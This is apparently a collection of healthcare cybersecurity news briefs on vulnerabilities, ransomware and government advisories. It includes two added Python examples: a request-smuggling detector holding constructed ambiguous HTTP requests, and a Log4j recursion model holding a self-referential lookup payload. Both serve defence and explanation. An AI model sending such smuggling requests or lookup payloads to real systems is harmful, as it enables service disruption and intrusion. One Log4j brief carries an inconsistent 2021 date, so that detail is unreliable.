CISA said the information will help it fill critical information gaps, deploy resources, analyze trends, issue warnings, and build a common understanding of how adversaries are targeting U.S. networks and critical infrastructure sectors.

BD Discloses 2 Vulnerabilities in its Pyxis, Viper LT, and Rowa Products

Becton, Dickinson and Company (BD) has disclosed two vulnerabilities affecting its BD Pyxis automated medication dispensing systems, BD Viper LT automated molecular testing systems, and BD Rowa pouch packaging systems.

Both vulnerabilities stem from the use of hard-coded credentials. If exploited, they could allow an unauthorized person to access, modify, or delete sensitive data, which may include electronic protected health information (ePHI).

The more serious vulnerability, tracked as CVE-2022-22765, affects all BD Viper LT system versions from 2.0 onward and has a CVSS score of 8.0 out of 10.

BD is currently addressing the vulnerability and will include a fix in the upcoming BD Viper LT system version 4.80 software release. In the meantime, BD recommends compensating controls: ensuring physical access controls are in place, allowing only authorized users to access the system, not connecting the system to the network where possible, and, where the system cannot be isolated from the network, applying industry-standard network security policies and procedures.

The second vulnerability, tracked as CVE-2022-22766, affects the BD Pyxis product family and BD Rowa Pouch Packaging Systems and has a CVSS score of 7.0 out of 10. If exploited, an attacker could gain access to the file system and abuse application files that could be used to decrypt application credentials or gain access to ePHI.

The credentials are managed by BD, and customers cannot view or use them to access or operate BD Pyxis devices. To exploit the vulnerability, a threat actor would need to obtain the hard-coded credentials, compromise a facility's network, and gain access to each device.

BD said it is strengthening credential management capabilities in BD Pyxis devices. In the meantime, compensating controls can be applied to the affected products: limiting physical access to authorized personnel, tightly controlling the BD Pyxis system credentials provided to authorized users, isolating affected products in a secure VLAN or behind firewalls, and monitoring and logging network traffic. The Pyxis Security Module for automated patching and virus definition management is provided to all accounts; customers should work with their BD support team to ensure all patches and virus definitions are up to date.

BD is committed to transparency with its customers and makes product security information, including vulnerability disclosures, available through the BD Cybersecurity Trust Center. As part of that commitment, BD published product security bulletins on the use of hard-coded credentials. Customers and end users do not use the hard-coded credentials directly to access these systems.

There have been no reports of the vulnerabilities being exploited in clinical environments. BD reported the vulnerabilities to the ISAOs, FDA, and CISA to raise awareness.

HHS Warns of Potential Threats to the Healthcare Industry

The Department of Health and Human Services' Health Sector Cybersecurity Coordination Center (HC3) has issued an advisory to the U.S. health sector about potential cyber threats that could spill over from the conflict in Ukraine and affect U.S. healthcare providers.

HC3 said HHS is not aware of any specific threats to the Health and Public Health (HPH) sector; however, allies on both sides of the conflict clearly have cyber capabilities, and there is concern that the HPH sector could be attacked as a result of the conflict.

HC3 warned that threats may come from three sources: threat actors linked to the Russian government, threat actors linked to the Belarusian government, and cybercriminal groups operating out of Russia and its neighboring states. There is also potential for other cybercriminal groups to become involved in the conflict or to use it as cover for unrelated cyberattacks.

Russia has been a global cyber power for decades. Going back to the Moonlight Maze attacks on the U.S. Department of Defense in the 1990s, Russian state-sponsored actors are believed to be responsible for some of the most sophisticated cyberattacks publicly disclosed. In particular, they are known to target the critical infrastructure of adversaries to advance their geopolitical aims.

There are also highly capable cybercriminal groups that operate out of Russia or have declared their support for Russia, including the group behind Conti ransomware. The Conti gang, widely believed to have also operated Ryuk ransomware, has extensively targeted the U.S. healthcare sector. It engages in big game hunting and multi-stage attacks and targets managed service providers (MSPs) and their downstream customers. Conti practices double and triple extortion: it exfiltrates data before encryption, then threatens to publish the data and notify partners and shareholders if the ransom is not paid.

HC3 believes the Conti group and/or other cybercriminal groups may either take part in the conflict or exploit it for financial gain. The threat group known as UNC1151 is believed to be linked to the Belarusian military and reportedly conducted phishing campaigns targeting Ukrainian troops in January, and the WhisperGate wiper used in cyberattacks in Ukraine has been linked to Belarus.

WhisperGate is one of three wiper malware variants identified recently. These wipers use ransomware as a decoy and drop ransom notes claiming that files have been encrypted; in fact, the master boot record is destroyed rather than encrypted, and there is no way to recover.

Another wiper, HermeticWiper, was used in attacks in Ukraine from February 24, 2022, and several variants have since been identified. ESET has recently discovered a further wiper, which it named IsaacWiper, and is currently investigating it.

Although attacks using these wipers are currently targeted at Ukraine, the precedent is NotPetya: in 2017, that wiper was used in targeted attacks in Ukraine, delivered through compromised tax software, yet it spread worldwide and affected several healthcare organizations in the United States.

All organizations in the HPH sector are strongly advised to adopt a heightened state of vigilance, take steps to strengthen their defenses, and review CISA guidance on mitigations and improving resilience to cyberattacks.

HHS Increases Awareness of Threats to Electronic Health Record Systems

The U.S. Department of Health and Human Services' Health Sector Cybersecurity Coordination Center (HC3) has issued a threat brief warning about the threats to electronic health record (EHR) systems, which are commonly targeted by threat actors.

Attacks on EHRs can be highly lucrative for threat actors. EHRs typically contain all the information needed for many types of fraud, including names, dates of birth, addresses, government and state ID numbers, Social Security numbers, health information, and health insurance details. No other type of database holds such a broad range of data. The data commands a high price on the black market and is readily bought by cybercriminals engaged in identity theft and tax and insurance fraud.

Malware, and ransomware in particular, poses a significant threat to EHRs. Ransomware can be used to encrypt EHR data to prevent access, which disrupts medical services and creates patient safety issues, increasing the likelihood that the ransom will be paid. Phishing attacks to obtain the credentials needed to access EHRs are also common.

A cybersecurity strategy should be developed to protect against malware and ransomware attacks. These attacks often begin with phishing emails, so email security solutions should be implemented and end users trained to recognize phishing emails and other email-based threats. Regular security awareness training improves resilience to attacks that target employees, who are often the weakest link in the security chain. Attacks on Remote Desktop Protocol (RDP) are also common; consider using a VPN rather than exposing RDP directly to the internet. Threat actors frequently exploit unpatched vulnerabilities, so it is important to patch promptly and to prioritize critical vulnerabilities, especially those known to have been exploited in attacks. CISA's Known Exploited Vulnerabilities Catalog can help IT and security teams prioritize patching.

Many healthcare organizations encrypt EHR data. Encryption protects data in transit between on-site users and external cloud applications, but there can be blind spots in encryption that threat actors can use to avoid detection while carrying out an attack. Healthcare organizations now commonly use cloud services, including cloud-hosted EHRs. All data sent to cloud services must be adequately protected to comply with HIPAA, and cloud access security broker (CASB) solutions can help with this.

Steps must be taken to prevent attacks by external threat actors, but there are also insider threats to EHR data. Healthcare employees are given access to EHRs and could easily abuse that access to view or steal patient data. Employees must be trained on internal policies covering EHR use and data access, and on how HIPAA prohibits unauthorized access to data. The sanctions policy should be explained, along with the potential for criminal charges for unauthorized access to medical records. Administrative controls should make it difficult for staff to access data without authorization, and EHR policies must be enforced.

Physical and system access should be monitored, audits should be conducted regularly to identify unauthorized access, and device and media controls should be implemented to prevent unauthorized copying of EHR data. An endpoint hardening strategy should also be implemented that applies multiple layers of security to all endpoints. That strategy should also ensure that any breach is detected and contained before attackers can gain access to EHRs and patient records.

Healthcare organizations should engage in threat hunting to identify threat actors who have bypassed perimeter defenses and gained access to endpoints. Penetration testers should be used for ‘Red Team’ exercises that apply attacker tradecraft to find and exploit vulnerabilities. Cybersecurity professionals should also form a Blue Team, which advises the IT security team on the improvements needed to prevent sophisticated cyberattacks.

EHRs deliver considerable benefits, but the risks to data must be properly managed. The HHS advises healthcare leaders to shift their focus from prevention alone to building a proactive readiness plan that fully accounts for the vulnerabilities in their EHRs, and then to adopt a framework that helps identify and prevent attacks.

Prompt Patching Required to Fix Critical SAP Vulnerabilities

The German business software company SAP has released patches to fix a set of critical vulnerabilities affecting SAP applications that use the SAP Internet Communication Manager (ICM). The vulnerabilities, collectively named ICMAD (Internet Communication Manager Advanced Desync), were identified by researchers at Onapsis Research Labs. All three can be exploited to gain remote code execution, which would allow remote attackers to fully compromise vulnerable SAP applications.

The vulnerabilities have an effect on the following SAP software:

  • SAP NetWeaver AS ABAP
  • SAP Web Dispatcher
  • SAP Content Server 7.53
  • ABAP Platform
  • SAP NetWeaver AS Java

The vulnerabilities can be exploited to steal victim sessions and credentials in plaintext, alter the behavior of applications, access PHI and sensitive business data, and cause denial of service. CVE-2022-22536 is the most severe of the three and was assigned the maximum CVSS score of 10/10. Onapsis said an unauthenticated attacker could easily exploit the vulnerability on SAP applications in the default configuration by sending a request through the commonly exposed HTTP(S) service.

When business applications allow HTTP(S) access, the most common configuration places an HTTP(S) proxy between clients and the backend SAP system, and it is this setup that allows the vulnerability to be exploited. The second vulnerability, tracked as CVE-2022-22532 (CVSS 8.1), can also be exploited in this configuration, and also when no proxy is present. The third vulnerability, tracked as CVE-2022-22533 (no CVSS score yet), could also lead to remote code execution.

The vulnerabilities were discovered while researching HTTP request smuggling techniques, which the researchers found can be leveraged using requests that closely resemble legitimate HTTP requests. These attacks are therefore hard for security teams to detect. In addition, the vulnerabilities are very easy to exploit.
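As an added example (not code from the article, nor from Onapsis or SAP), the following Python check flags the conflicting body-framing headers that request smuggling depends on, so that a reverse proxy or log-review job can reject or alert on them before they reach a backend; the request samples, hostnames and paths are constructed.

```python
"""Flags HTTP/1.1 requests whose body framing is ambiguous.

Added example, not part of the article or of any vendor tooling. Request
smuggling, the bug class behind ICMAD, relies on a proxy and a backend
disagreeing about where one request's body ends and the next request begins.
The usual source of that disagreement is conflicting framing headers. Running
this check at the proxy and rejecting anything it flags removes the ambiguity
before the backend ever sees the request. All sample requests are constructed.
"""
from typing import Dict, List, Tuple

Header = Tuple[str, str]  # (name exactly as sent, value with surrounding OWS removed)


def parse_head(raw: bytes) -> Tuple[str, List[Header]]:
    """Split a raw request into its request line and header fields.

    Names are kept exactly as sent so that tricks such as a space before the
    colon ('Transfer-Encoding : chunked') remain visible to the checker.
    """
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    headers: List[Header] = []
    for line in lines[1:]:
        if not line:
            continue
        name, sep, value = line.partition(":")
        headers.append((name, value.strip(" \t") if sep else ""))
    return lines[0], headers


def framing_findings(raw: bytes) -> List[str]:
    """Return the reasons a request's framing is ambiguous; [] means clean.

    "Clean" follows RFC 7230 section 3.3: at most one framing mechanism, a
    single numeric Content-Length, a Transfer-Encoding of exactly 'chunked'
    when present, and no whitespace inside header names.
    """
    _, headers = parse_head(raw)
    findings: List[str] = []
    by_name: Dict[str, List[str]] = {}
    for name, value in headers:
        if name != name.strip():
            findings.append(f"whitespace in header name {name!r}")
        by_name.setdefault(name.strip().lower(), []).append(value)

    cl_values = by_name.get("content-length", [])
    te_values = by_name.get("transfer-encoding", [])

    if cl_values and te_values:
        findings.append("both Transfer-Encoding and Content-Length present")
    if len(cl_values) > 1:
        findings.append(f"duplicate Content-Length headers {cl_values!r}")
    for value in cl_values:
        if not value.isdigit():
            findings.append(f"non-numeric Content-Length {value!r}")
    for value in te_values:
        if value.lower() != "chunked":
            findings.append(f"Transfer-Encoding is not exactly 'chunked': {value!r}")
    return findings


def is_ambiguous(raw: bytes) -> bool:
    """True when the request should be rejected at the proxy."""
    return bool(framing_findings(raw))


# Constructed sample requests (hostname and path are placeholders).
CLEAN_REQUEST = (
    b"POST /app/submit HTTP/1.1\r\n"
    b"Host: app.example.internal\r\n"
    b"Content-Length: 5\r\n"
    b"\r\n"
    b"hello"
)
CL_TE_REQUEST = (  # two framing mechanisms: proxy and backend may disagree
    b"POST /app/submit HTTP/1.1\r\n"
    b"Host: app.example.internal\r\n"
    b"Content-Length: 4\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n\r\n"
)
DUPLICATE_CL_REQUEST = (
    b"POST /app/submit HTTP/1.1\r\n"
    b"Host: app.example.internal\r\n"
    b"Content-Length: 5\r\n"
    b"Content-Length: 7\r\n"
    b"\r\n"
    b"hello"
)
OBFUSCATED_TE_REQUEST = (  # name with trailing space and a non-standard coding
    b"POST /app/submit HTTP/1.1\r\n"
    b"Host: app.example.internal\r\n"
    b"Transfer-Encoding : xchunked\r\n"
    b"\r\n"
    b"0\r\n\r\n"
)

if __name__ == "__main__":
    for label, req in [("clean", CLEAN_REQUEST), ("cl+te", CL_TE_REQUEST),
                       ("dup-cl", DUPLICATE_CL_REQUEST), ("obf-te", OBFUSCATED_TE_REQUEST)]:
        print(f"{label:7} -> {framing_findings(req) or 'unambiguous'}")
```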

SAP applications are widely used by businesses, including in the healthcare sector. When vulnerabilities are discovered, hackers can quickly exploit them to gain access to applications to steal data or cripple business systems. Often, the first exploits of SAP vulnerabilities occur within 72 hours of the patches being released.

SAP applications are used to manage business processes, and in healthcare they often contain protected health information (PHI). Vulnerabilities in SAP software could therefore be exploited to steal patient data.

SAP and Onapsis have urged all organizations using vulnerable SAP applications to apply the patches immediately to prevent exploitation. The Cybersecurity and Infrastructure Security Agency (CISA) has also issued an alert about the vulnerabilities urging prompt patching. Organizations should prioritize patching affected systems that are exposed to untrusted networks, such as the Internet. Onapsis has released a free, open-source scanning tool that organizations can use to determine whether they are vulnerable to ICMAD exploits.

Healthcare Cybersecurity Risks in 2022

The healthcare industry continues to face a wide range of threats. Ransomware attacks and data breaches remain rampant. In 2021, healthcare data breaches were reported at a rate of around 2 per day, and although the number of ransomware attacks fell compared to 2020, ransomware remains a significant threat, with several ransomware gangs actively targeting the healthcare industry.

In its Q4 2021 Healthcare Cybersecurity Bulletin, published on January 21, the Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3) warned of several ongoing cyberattack trends that are likely to continue in Q1 2022.

Ransomware

Law enforcement agencies in the United States and Europe have stepped up their efforts to bring ransomware operators and their affiliates to justice, and those campaigns have resulted in the arrests of key members of several ransomware groups. This year, in an unusual act of cooperation between the U.S. and Russia, 14 suspected members of the notorious REvil ransomware gang were arrested. The increased pressure on ransomware groups has helped to curb attacks, but many ransomware gangs remain in operation, many of which have been actively attacking the healthcare industry.

Emsisoft recorded 68 ransomware attacks on healthcare providers in 2021, down from the 80 healthcare organizations attacked in 2020; however, there were also several attacks on business associates that affected multiple healthcare organizations. According to a recent FinCEN report, there are at least 68 active ransomware operations, and the 10 leading ransomware groups in 2021 took in over $5.2 billion in ransom payments. Ransomware will remain a problem for the healthcare sector in 2022, so it is essential to follow industry best practices to prepare for, prevent, and recover from ransomware attacks in order to ensure patient safety.

Apache Log4J

The vulnerabilities in the Apache Log4j logging library, first disclosed publicly in late November 2021, continue to cause problems for healthcare organizations. A proof-of-concept exploit was released in December 2021, and several threat actors have been exploiting the vulnerabilities. HC3 issued a threat brief on January 20, 2021, warning of the threat of exploitation of the 6 vulnerabilities and recommending mitigations that should be implemented immediately to reduce the risk of exploitation.

Emotet Botnet

Emotet malware first appeared in 2014 and has been widely used in attacks on healthcare organizations. Devices infected with the Emotet Trojan are added to the botnet, and access to those devices is sold to other threat groups, often leading to ransomware attacks. The botnet was taken down in January 2021, which partly explains the decline in ransomware attacks; however, the botnet is now being rebuilt with greater resilience to takedown efforts and has several new capabilities. Emotet is likely to pose a substantial threat to the healthcare sector in 2022, so it is important to take steps to improve defenses. Emotet is primarily distributed through phishing emails, so healthcare organizations should implement robust email security measures and ensure they provide security awareness training to employees.

Vulnerabilities

Vulnerabilities in information systems can be exploited to gain access to healthcare networks and sensitive data. It is vital for healthcare providers to stay on top of patching and to apply software updates promptly. Patching should be prioritized, with the vulnerabilities listed in the Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities Catalog addressed first, together with any critical vulnerabilities in software, operating systems, and firmware.

Log4j Version Three Released to Resolve High Severity DoS Vulnerability

The original vulnerability identified in Log4j (CVE-2021-44228), which shocked the world because of its severity, ease of exploitation, and the extent to which it affects software and cloud services, is not the only vulnerability in the Java-based logging utility.

Following the release of version 2.15.0 to fix that vulnerability, it was confirmed that version 2.15.0 remained vulnerable in certain non-default configurations because of an incomplete patch. That vulnerability is tracked as CVE-2021-45046 and was fixed in version 2.16.0 of Log4j. It was initially rated low severity with a CVSS score of 3.7, but the severity has since been raised to critical (CVSS 9.0): although it was first reported as a denial-of-service bug, it was later established that it can be exploited for data exfiltration and remote code execution.

As per Apache, “If the logging configuration utilizes a non-default Pattern Layout having a Context Lookup (for instance, $${ctx:loginId}), attackers who can control the Thread Context Map (MDC) input information could create malicious input data that consists of a recursive lookup, leading to a StackOverflowError that may shut down the process.”

Apache strongly recommended that organizations upgrade again, to version 2.16.0, to prevent exploitation of that vulnerability; however, yet another vulnerability has since been discovered, tracked as CVE-2021-45105. The new vulnerability is a DoS bug with a CVSS score of 7.5 (high severity) and affects all versions of Log4j from 2.0-beta9 up to 2.16.0.

According to the Apache Software Foundation (ASF), Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect against uncontrolled recursion from self-referential lookups. If the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers who can control Thread Context Map input data can craft malicious input that contains a recursive lookup, causing a StackOverflowError that terminates the process.
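As an added example, and not Log4j code, the following Python model of the Context Lookup described in the two paragraphs above contrasts the pre-2.17.0 behaviour (substituted values are expanded again, so a self-referential MDC value never terminates) with the hardened single-pass behaviour; the pattern, the MDC values and the depth limit are constructed stand-ins.

```python
"""Simplified model of the recursive Context Lookup behind CVE-2021-45105.

Added example; this is a Python model, not Log4j code. A Pattern Layout that
contains ${ctx:key} pulls a value out of the Thread Context Map (MDC). Before
2.17.0 the substituted value was itself scanned for further lookups, so an
MDC value under attacker control that reads ${ctx:loginId} refers back to
itself and the expansion never terminates (a StackOverflowError in the JVM).
The hardened variant resolves lookups in the pattern only and inserts MDC
values verbatim. In a real log4j2.xml the pattern is written $${ctx:loginId}
so the lookup is deferred to log time; the model takes the unescaped form.
"""
import re
from typing import Dict

LOOKUP = re.compile(r"\$\{ctx:([A-Za-z0-9_.-]+)\}")
MAX_DEPTH = 200  # stands in for the JVM's finite call stack


class StackOverflowError(RuntimeError):
    """Raised when nested lookups exceed MAX_DEPTH (the JVM would crash)."""


def expand_recursive(pattern: str, mdc: Dict[str, str], depth: int = 0) -> str:
    """Pre-2.17.0 behaviour: every substituted value is expanded again."""
    if depth > MAX_DEPTH:
        raise StackOverflowError("self-referential lookup")

    def resolve(match) -> str:
        value = mdc.get(match.group(1), "")
        return expand_recursive(value, mdc, depth + 1)  # re-scan the value

    return LOOKUP.sub(resolve, pattern)


def expand_once(pattern: str, mdc: Dict[str, str]) -> str:
    """Hardened behaviour: lookups in the pattern are resolved exactly once;
    whatever the MDC holds is copied into the output as plain text."""
    return LOOKUP.sub(lambda m: mdc.get(m.group(1), ""), pattern)


def render(pattern: str, mdc: Dict[str, str], hardened: bool) -> str:
    """Render one log line, or a marker if the logging thread would crash."""
    try:
        if hardened:
            return expand_once(pattern, mdc)
        return expand_recursive(pattern, mdc)
    except StackOverflowError:
        return "<StackOverflowError: logging thread crashed>"


# Constructed inputs. The pattern is what an operator configures; the MDC
# values are what request-handling code stores, e.g. straight from a login form.
PATTERN = "%d [${ctx:loginId}] %m"
BENIGN_MDC = {"loginId": "alice"}
HOSTILE_MDC = {"loginId": "${ctx:loginId}"}  # value refers to itself
CYCLIC_MDC = {"loginId": "${ctx:session}", "session": "${ctx:loginId}"}

if __name__ == "__main__":
    for label, mdc in [("benign", BENIGN_MDC), ("self-ref", HOSTILE_MDC), ("cycle", CYCLIC_MDC)]:
        print(f"{label:8} pre-2.17.0: {render(PATTERN, mdc, hardened=False)}")
        print(f"{label:8} hardened : {render(PATTERN, mdc, hardened=True)}")
```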

CVE-2021-45105 has been fixed in version 2.17.0, the third Log4j release in 10 days. More information on the Log4j vulnerabilities and the latest updates is available on this page.

SonicWall Proposes Speedy Software Upgrade to Resolve Critical Vulnerabilities in SMA 100 Series Appliances

SonicWall has released new software for its Secure Mobile Access (SMA) 100 series remote access appliances that fixes 8 vulnerabilities, including two critical and four high-severity flaws.

Threat actors have exploited vulnerabilities in SonicWall appliances in ransomware attacks in the past. Although there are currently no known cases of this latest batch of vulnerabilities being exploited in the wild, there is a high risk of exploitation if the firmware is not updated promptly. The SMA 100 series appliances affected by the vulnerabilities are the SonicWall SMA 210, 200, 410, 400, and 500v secure access gateways.

The most critical vulnerabilities are buffer overflow flaws that an unauthenticated attacker could exploit remotely to execute code on vulnerable devices. These are:

  • CVE-2021-20045 has a CVSS score of 9.4. It covers multiple unauthenticated file explorer heap-based and stack-based buffer overflow vulnerabilities.
  • CVE-2021-20038 has a CVSS score of 9.8. It is an unauthenticated stack-based buffer overflow vulnerability.

The 4 high severity vulnerabilities are the following:

  • CVE-2021-20041 has a CVSS score of 7.5. It is an unauthenticated CPU exhaustion vulnerability.
  • CVE-2021-20043 has a CVSS score of 8.8. It is a heap-based buffer overflow vulnerability that allows remote code execution, but the attacker must be authenticated.
  • CVE-2021-20044 has a CVSS score of 7.2. It is a post-authentication remote code execution vulnerability.
  • CVE-2021-20039 has a CVSS score of 7.2. It is an authenticated command injection vulnerability.

Two medium-severity vulnerabilities were likewise resolved:

  • CVE-2021-20042 has a CVSS score of 6.3. It is an unauthenticated ‘confused deputy’ vulnerability.
  • CVE-2021-20040 has a CVSS score of 6.5. It is an unauthenticated file upload path traversal vulnerability.

The software update is available from MySonicWall.com and should be applied without delay to prevent exploitation. SonicWall states that there are no temporary mitigations that can be applied to prevent exploitation of the vulnerabilities.

HC3 Warns Healthcare Sector Regarding Risk of Zero-day Attacks

The HHS’ Health Sector Cybersecurity Coordination Center (HC3) has issued an alert to the healthcare and public health sector about an increase in financially motivated zero-day attacks, setting out mitigation strategies that should be followed to reduce risk to a low and acceptable level.

A zero-day attack exploits a vulnerability for which no patch is yet available. Such vulnerabilities are called zero-day because the developer has not yet released a patch to fix the flaw.

Zero-day attacks are attacks launched by a threat actor using a weaponized exploit for a zero-day vulnerability. Zero-day vulnerabilities are used in attacks on all industry sectors and are not just a problem for healthcare. For example, in 2010, exploits for four zero-day vulnerabilities were used in the “Stuxnet” attack on the Iranian nuclear program, which caused Iranian centrifuges to destroy themselves, disrupting Iran’s nuclear program.

More recently, in 2017, a zero-day vulnerability was exploited to deliver the Dridex banking Trojan. Normally a user would have to take further action after opening a malicious email attachment before malware is downloaded, but by incorporating a zero-day exploit, the cybercriminals were able to install the Dridex banking Trojan as soon as the user opened the infected attachment.

The very nature of zero-day vulnerabilities means the risk cannot be eliminated entirely, since software developers must first create patches to fix the vulnerabilities; however, steps can be taken to limit the opportunities for zero-day vulnerabilities to be exploited.

The number of identified zero-day exploits more than doubled between 2019 and 2021. This is partly because of the high prices paid for zero-day exploits: the amount paid for working exploits increased by over 1,150% from 2018 to 2021. The market for zero-day exploits was once limited to a few well-funded groups, but there are now many threat actors with substantial resources who are willing to pay because they know they can recoup the cost many times over by using the exploits in attacks. A zero-day exploit can now be worth over $1 million.

Zero-day attacks aimed specifically at the healthcare sector are entirely possible. In August this year, a zero-day vulnerability dubbed PwnedPiper was discovered in the pneumatic tube systems used in hospitals to transport biological samples and medications. The vulnerability was found in the control panel, which allowed unsigned firmware updates to be applied. An attacker could exploit the vulnerability to take control of the system and deploy ransomware.

In August 2020, four zero-day vulnerabilities were found in OpenClinic that exposed patients’ test results. Unauthenticated attackers could retrieve files containing sensitive data from the medical test directory, including medical test data.

The best defense against zero-day vulnerabilities is to apply patches immediately; however, patching is often slow, especially in healthcare. A 2019 survey by the Ponemon Institute found that it took an average of 97 days to apply, test, and deploy a patch for a zero-day vulnerability after the patch was released.

HC3’s recommendation is to “patch quickly, patch regularly, patch totally.” HC3 provides up-to-date information on actively exploited zero-days and the patches available to fix them. HC3 also recommends using a web application firewall to inspect incoming traffic and filter out malicious input, as this can prevent threat actors from reaching vulnerable systems. It also recommends deploying runtime application self-protection (RASP) agents, which sit inside an application’s runtime and can detect anomalous patterns. Network segmentation is also strongly recommended.

The TLP: WHITE Zero-Day Threat Brief may be downloaded here.

13 Siemens Nucleus RTOS TCP/IP Stack Vulnerabilities Identified in Medical Devices

13 vulnerabilities have been discovered in the Siemens Nucleus RTOS TCP/IP stack that threat actors could exploit remotely to achieve arbitrary code execution, conduct denial-of-service attacks, and obtain sensitive data.

The vulnerabilities, collectively named NUCLEUS:13, affect the TCP/IP stack (Nucleus NET) and the related FTP and TFTP services of the Nucleus Real-Time Operating System (RTOS). This networking component is used in many safety-critical devices; in the healthcare sector, medical devices such as patient monitors and anesthesia machines use Nucleus.

One critical vulnerability, with a CVSS v3 severity score of 9.8 out of 10, could allow remote code execution. Ten high-severity vulnerabilities have CVSS scores between 7.1 and 8.8, and two medium-severity vulnerabilities have CVSS scores of 5.3 and 6.5.

The vulnerabilities were identified by security researchers at Forescout Research Labs, with assistance from researchers at Medigate.

These Nucleus RTOS products are affected by the vulnerabilities:

  • Nucleus NET: All versions
  • Capital VSTAR: All versions
  • Nucleus Source Code: All versions
  • Nucleus ReadyStart v4: All versions before v4.1.1
  • Nucleus ReadyStart v3: All versions before v2017.02.4

Determining where vulnerable code is in use is difficult. The researchers attempted to estimate the impact of the vulnerabilities using data gathered from the official Nucleus website, the Forescout Device Cloud, and the Shodan search engine. Healthcare is the most heavily affected sector, with 2,233 vulnerable healthcare devices identified. 1,066 government devices, 348 retail devices, 326 financial devices, and 317 manufacturing devices were also identified as vulnerable, and 1,176 vulnerable devices were found in other industry sectors. The vulnerable devices are used as follows: 76% in building automation, 13% in operational technology, 5% in IoT, 4% in networking, and 2% are computers running Nucleus.

The vulnerabilities were reported to Siemens in accordance with responsible disclosure guidelines, and Siemens has already released patches to fix all of the vulnerabilities that were discovered. Siemens said several of the vulnerabilities had been discovered and fixed in earlier releases, but no CVEs had been assigned.

Applying patches to fix the vulnerabilities can be difficult, particularly for embedded devices and mission-critical devices such as those used in healthcare.

Where patching is not possible, Forescout and Siemens recommend applying mitigating measures to reduce the opportunity for exploitation. Siemens advises restricting network access to vulnerable devices using appropriate mechanisms and ensuring the devices are operated in protected IT environments configured in accordance with Siemens’ operational guidelines.

Forescout has released an open-source script that uses active fingerprinting to identify devices running Nucleus, for discovery and inventory purposes. Once the devices have been located, Forescout recommends implementing segmentation controls and practicing proper network hygiene, such as restricting external communication paths and isolating or containing vulnerable devices in their own zone until they can be patched.

In addition, progressive patches released by the vendors of affected devices should be monitored, and all network traffic should be inspected for malicious activity. A remediation plan should be developed for all vulnerable assets that balances business continuity requirements with risk.

Philips MRI Solutions Found With 3 Medium Severity Vulnerabilities

Three medium-severity vulnerabilities have been identified in Philips MRI products that an unauthorized person could exploit to run software, change device settings, access and modify files, and export data, including protected health information (PHI), to an untrusted location.

Aguilar found that the software has improper access controls that do not restrict access by unauthorized persons (CVE-2021-3083), assigns an owner that is outside the intended control sphere (CVE-2021-3085), and exposes sensitive information to persons who should not have access to it (CVE-2021-3084). All three vulnerabilities have been assigned a CVSS v3 base score of 6.2 out of 10.

The vulnerabilities were identified by Michael Aguilar, a consultant at Secureworks Adversary Group. They affect Philips MRI 3T Version 5.x.x and Philips MRI 1.5T Version 5.x.x. Aguilar reported the vulnerabilities to Philips, and a patch is scheduled for release in October 2022. In the meantime, Philips recommends implementing mitigating measures to prevent exploitation of the vulnerabilities.

The mitigations include operating the Philips MRI machines only in accordance with authorized specifications and ensuring that physical and logical controls are in place. Only authorized personnel should be allowed access to the location of the MRI machines, and all guidance provided by Philips for operating the machines should be followed.

Philips has not received any reports of exploitation of the vulnerabilities, nor any reports of incidents from the clinical use of the products in connection with the three vulnerabilities.

Microsoft Alerts of Continuing Attacks by SolarWinds Hackers on Downstream Businesses and Service Providers

The advanced persistent threat (APT) actor Nobelium (also known as Cozy Bear and APT29), which was responsible for the 2020 SolarWinds supply chain attack, is targeting managed service providers (MSPs), cloud service providers (CSPs), and other IT service providers, according to a new advisory from Microsoft.

Rather than attacking many organizations directly, Nobelium has adopted a compromise-one-to-compromise-many approach. This is possible because service providers are often granted administrative access to customer networks in order to deliver IT services. Nobelium is seeking to abuse that privileged access to attack downstream organizations and has been conducting such attacks since May 2021.

Nobelium uses a range of techniques to compromise service providers’ systems, including token theft, phishing and spear phishing, malware, API abuse, supply chain attacks, and password spraying against accounts using commonly used passwords and passwords compromised in previous data breaches.

Once access to a service provider’s network has been gained, Nobelium moves laterally in the cloud and then uses the trusted access to attack downstream organizations through trusted channels, such as externally facing VPNs or the specialized tools service providers use to access customer environments.

Some of the attacks conducted by Nobelium were highly sophisticated and involved chaining together artifacts and access at multiple service providers in order to reach the final target.

The Microsoft Threat Intelligence Center (MSTIC) has issued guidance for service providers and downstream organizations to assist with remediation and mitigation.

MSPs and CSPs that rely on elevated privileges to deliver services to their customers have been advised to verify and monitor compliance with Microsoft Partner Center security requirements, which include enabling multifactor authentication and enforcing conditional access policies, adopting the Secure Application Model framework, reviewing activity logs and monitoring user activity, and removing delegated administrative privileges that are no longer used.

All downstream organizations that rely on service providers having administrative access have been advised to evaluate, review, and reduce access privileges and delegated permissions, including hardening and monitoring all tenant administrator accounts and reviewing service provider permissions and access from local and B2B accounts. They should also verify that MFA is enabled and conditional access policies are enforced, and regularly review audit logs and configurations.

Microsoft has published full details of Nobelium’s tactics, techniques, and procedures (TTPs) in its advisory to help IT security teams prevent, detect, investigate, and mitigate attacks.

Notification Issued Regarding Ongoing BlackMatter Ransomware Attacks

The Federal Bureau of Investigation (FBI), National Security Agency (NSA), and the Cybersecurity and Infrastructure Security Agency (CISA) have issued a joint alert about ongoing BlackMatter ransomware attacks.

The group has been conducting attacks in the U.S. since July 2021, including attacks on critical infrastructure entities and two organizations in the U.S. Food and Agriculture Sector. Evidence has been obtained linking the gang to the DarkSide ransomware group, which conducted attacks between September 2020 and May 2021, including the attack on Colonial Pipeline; BlackMatter is possibly a rebrand of the DarkSide operation.

Investigations into the attacks have provided the agencies with important information about the group’s tactics, techniques, and procedures (TTPs), and a sample of the ransomware has been analyzed in a sandbox environment.

The gang is known to use previously compromised credentials to gain access to victims’ networks, then leverages the Lightweight Directory Access Protocol (LDAP) and Server Message Block (SMB) protocol to access Active Directory (AD) and discover all hosts on the network. BlackMatter then deploys the ransomware and remotely encrypts the hosts and shared drives as they are discovered. The group is known to exfiltrate data and typically demands ransom payments of between $80,000 and $15 million in Monero or Bitcoin.

In the joint alert, the NSA, FBI, and CISA describe the TTPs, provide Snort signatures that can be used to detect network activity associated with BlackMatter ransomware attacks, and list a number of mitigations to reduce the risk of an attack by the gang.

Mitigations consist of:

  1. Using detection signatures to identify and block attacks in progress
